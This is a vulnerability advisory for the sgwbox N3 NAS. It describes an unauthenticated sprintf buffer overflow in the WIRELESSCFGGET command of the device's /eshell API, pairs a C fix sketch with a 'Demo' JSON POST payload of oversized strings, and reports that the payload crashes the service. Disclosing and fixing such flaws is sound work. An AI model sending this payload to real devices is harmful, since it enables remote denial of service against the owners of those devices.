Information

Vendor: sgwbox

Affected products: N3 NAS ≤ V2.0.25

Vendor Homepage: https://mall.sgwbox.com/

Vendor contact information: mailto:box@new1cloud.com

Description

An unauthenticated buffer overflow vulnerability exists in the sgwbox N3 NAS. It stems from the lack of length validation and limits on the fields passed to the WIRELESSCFGGET command interface. An unauthenticated remote attacker could exploit this vulnerability to crash the service on the target NAS device, resulting in a remote denial of service.

Details

In /usr/sbin/http_eshell_server, the WIRELESSCFGGET command interface performs no authentication or verification, and neither the first nor the second parameter retrieved from params is length-checked. Both are concatenated directly with sprintf, which places no bound on the amount of data it writes to the destination buffer.

Therefore, an unauthenticated buffer overflow vulnerability exists here. An unauthenticated attacker could exploit it to crash the remote target NAS device, resulting in a remote denial of service.
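A sketch of the fix for the pattern described above, added here as an example and not taken from the vendor's firmware: the handler rejects unauthenticated callers, bounds each field, and formats with snprintf while checking for truncation. The function name, status codes, format string, and the PARAM_MAX and OUT_LEN sizes are assumptions, since the page does not give the real ones.

```c
#include <stdio.h>
#include <string.h>

#define PARAM_MAX 32   /* assumed per-field limit; not from the firmware */
#define OUT_LEN   80   /* assumed destination size; not from the firmware */

enum { REQ_OK = 0, REQ_UNAUTH = -1, REQ_BAD_PARAM = -2, REQ_TOO_LONG = -3 };

/* Pattern the advisory describes (kept as a comment, never compiled):
 *     char buf[OUT_LEN];
 *     sprintf(buf, "%s %s", p1, p2);   // no bound on p1 or p2
 */

/* 1 if s is a NUL-terminated string of at most max bytes, else 0. */
static int fits(const char *s, size_t max)
{
    return s != NULL && memchr(s, '\0', max + 1) != NULL;
}

/* Hypothetical hardened handler: authenticate, validate, then format with a bound. */
int handle_wirelesscfgget(int authenticated, const char *p1, const char *p2,
                          char *out, size_t out_len)
{
    if (out == NULL || out_len == 0)
        return REQ_BAD_PARAM;
    out[0] = '\0';
    if (!authenticated)
        return REQ_UNAUTH;               /* reject before touching params */
    if (!fits(p1, PARAM_MAX) || !fits(p2, PARAM_MAX))
        return REQ_BAD_PARAM;            /* oversized or missing field */
    int n = snprintf(out, out_len, "%s %s", p1, p2);
    if (n < 0 || (size_t)n >= out_len) { /* output would have been truncated */
        out[0] = '\0';
        return REQ_TOO_LONG;
    }
    return REQ_OK;
}

int main(void)
{
    char out[OUT_LEN], big[257];         /* constructed sample inputs */
    memset(big, 'a', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    printf("oversized: %d\n", handle_wirelesscfgget(1, big, big, out, sizeof out));
    printf("no auth:   %d\n", handle_wirelesscfgget(0, "wlan0", "ssid", out, sizeof out));
    printf("valid:     %d (%s)\n", handle_wirelesscfgget(1, "wlan0", "ssid", out, sizeof out), out);
    return 0;
}
```
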

Demo

Without authenticating, an attacker sends a JSON-formatted POST request to the /eshell API interface with no token information. For the WIRELESSCFGGET command interface, the attacker can supply excessively long strings as the first or second parameter of params.

{
  "params": [
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
  ],
  "cmd": "WIRELESSCFGGET"
}

As a result, the http_eshell_server service on the remote target NAS device crashes, causing a remote denial of service.

Credit